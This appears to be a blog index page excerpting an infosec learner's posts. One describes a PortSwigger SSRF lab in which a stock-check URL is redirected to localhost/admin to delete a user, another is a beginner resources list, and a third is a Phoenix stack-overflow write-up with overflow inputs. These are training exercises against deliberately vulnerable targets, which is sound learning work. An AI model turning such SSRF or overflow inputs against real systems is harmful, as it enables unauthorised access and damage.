Learning SSRF with Portswigger Labs

Basic SSRF against the local Server https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost When accessing a product page an check stock link checks the stock through an API on some URL. We just need to change the url to localhost/admin where we can see user delete links and here we go with the request to delete that carlos: POST /product/stock HTTP/1.1 … Read moreLearning SSRF with Portswigger Labs

The Big and Dandy „How to get into Infosec“ Resources Post 2020

On a daily basis and on all hacking oriented communities, people ask how to start or to get into Infosec. I decided to maintain a post where I collect my ressources regarding (beginner) learning ressources. I am learning towards an infosec position for a while now and I am now a trainee at a german … Read moreThe Big and Dandy „How to get into Infosec“ Resources Post 2020

WriteUp: Phoenix Exploit.Education

Writeup for the Phoenix VM from http://exploit.education/phoenix/. stack-onepython -c ‚print 64*“A“‚ stack-twoexport ExploitEducation=$“cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\n\t\n\r“ learned about endianess here. really missing some of the basic computer science stuff, but well coming to it… stack-threeuser@phoenix-amd64:/opt/phoenix/amd64$ objdump stack-three -x | grep level user@phoenix-amd64:/opt/phoenix/amd64$ python -c ‚print „c“*64+“\x9d\x06@“‚ | ./stack-three Welcome to phoenix/stack-three, brought to you by https://exploit.education calling function … Read moreWriteUp: Phoenix Exploit.Education